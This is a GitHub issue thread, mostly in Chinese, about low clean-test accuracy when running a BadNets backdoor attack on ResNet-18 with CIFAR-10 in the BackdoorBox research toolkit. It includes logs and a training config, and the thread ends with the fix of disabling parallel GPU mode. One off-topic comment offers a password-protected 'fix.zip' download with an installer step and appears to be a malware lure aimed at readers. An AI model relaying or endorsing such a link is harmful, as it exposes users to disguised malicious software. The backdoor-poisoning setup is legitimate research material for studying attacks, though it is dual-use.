### ISSUE TITLE
关于 ResNet-18_CIFAR-10_Attack攻击设置下的攻击成功率asr和干净样本的test acc 问题

### ISSUE THREAD

**Issue by aosodofogo** [THUYimingLi/BackdoorBox#77]
您好，我在ResNet-18_CIFAR-10_Attack攻击设置下，中毒率为0.1，训练200个epoch，最后得到的结果如下：

==========Test result on BA==========
[2024-08-26_22:10:31] Top-1 correct / Total: 8803/10000, Top-1 accuracy: 0.8803, Top-5 correct / Total: 9952/10000, Top-5 accuracy: 0.9952, time: 2.052043914794922

==========Test result on ASR_NoTarget==========
[2024-08-26_22:10:34] Top-1 correct / Total: 9788/10000, Top-1 accuracy: 0.9788, Top-5 correct / Total: 9980/10000, Top-5 accuracy: 0.998, time: 2.6380419731140137

请问这个结果是这个设置下最佳的吗，是否需要训练更多的epoch或者其他设置可以达到更高的准确率

**Comment by THUYimingLi** [comment]
> 您好，我在ResNet-18_CIFAR-10_Attack攻击设置下，中毒率为0.1，训练200个epoch，最后得到的结果如下：
> 
> ==========Test result on BA========== [2024-08-26_22:10:31] Top-1 correct / Total: 8803/10000, Top-1 accuracy: 0.8803, Top-5 correct / Total: 9952/10000, Top-5 accuracy: 0.9952, time: 2.052043914794922
> 
> ==========Test result on ASR_NoTarget========== [2024-08-26_22:10:34] Top-1 correct / Total: 9788/10000, Top-1 accuracy: 0.9788, Top-5 correct / Total: 9980/10000, Top-5 accuracy: 0.998, time: 2.6380419731140137
> 
> 请问这个结果是这个设置下最佳的吗，是否需要训练更多的epoch或者其他设置可以达到更高的准确率

请附上具体的训练设置及代码，否则无法知道你具体跑的什么方法和设置

**Comment by aosodofogo** [comment]
非常抱歉，我没有表达清楚。我做的是Badnet攻击，我在test_BadNets.py只中修改了中毒率，训练的是CiFAR10数据集，模型是Resnet-18，其他没有变动

**Comment by aosodofogo** [comment]
badnets = core.BadNets(
    train_dataset=trainset,
    test_dataset=testset,
    model=core.models.ResNet(18),
    loss=nn.CrossEntropyLoss(),
    y_target=1,
    poisoned_rate=0.1,
    pattern=pattern,
    weight=weight,
    seed=global_seed,
    deterministic=deterministic
)

# Train Attacked Model (schedule is the same as https://github.com/THUYimingLi/Open-sourced_Dataset_Protection/blob/main/CIFAR/train_watermarked.py)
schedule = {
    'device': 'GPU',
    'CUDA_SELECTED_DEVICES': CUDA_SELECTED_DEVICES,

    'benign_training': False,
    'batch_size': 1024,
    'num_workers': 4,

    'lr': 0.1,
    'momentum': 0.9,
    'weight_decay': 5e-4,
    'gamma': 0.1,
    'schedule': [150, 180],

    'epochs': 200,

    'log_iteration_interval': 100,
    'test_epoch_interval': 10,
    'save_epoch_interval': 10,

    'save_dir': 'experiments',
    'experiment_name': 'ResNet-18_CIFAR-10_BadNets'
}
badnets.train(schedule)
badnets.test(schedule)

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by THUYimingLi** [comment]
> 非常抱歉，我没有表达清楚。我做的是Badnet攻击，我在test_BadNets.py只中修改了中毒率，训练的是CiFAR10数据集，模型是Resnet-18，其他没有变动

原则上来说不会这么低，你可以换几个随机种子看看。另外，请确保你没有打开并行模式，目前并行模式部分的代码似乎有一点点问题。

**Comment by aosodofogo** [comment]
好的我去试一下，非常感谢

**Comment by BaCHiiii** [comment]
您好，我嘗試使用tests中的test_BadNets做測試，發現情況還是一樣(我看了code其實這份code跟example.py沒有很大的差別)，我原本以為可能是dataset的問題，所以改用預設的torch dataset，但發現情況依舊相同，圖片是原本的設定，請問可能的原因是什麼呢?
![image](https://github.com/user-attachments/assets/cd99dd28-647b-4ba6-b230-fca43322fa77)
![image](https://github.com/user-attachments/assets/db167f5b-7cdd-400d-8270-b91ae0e99129)

**Comment by kazefjj** [comment]
> 好的我去试一下，非常感谢

可以问一下是怎么解决的吗，我也是同样的问题，ACC只有88左右

**Comment by aosodofogo** [comment]
> > 好的我去试一下，非常感谢
> 
> 可以问一下是怎么解决的吗，我也是同样的问题，ACC只有88左右
我是把代码中的并行计算注释掉，只是用一个gpu训练就可以解决了
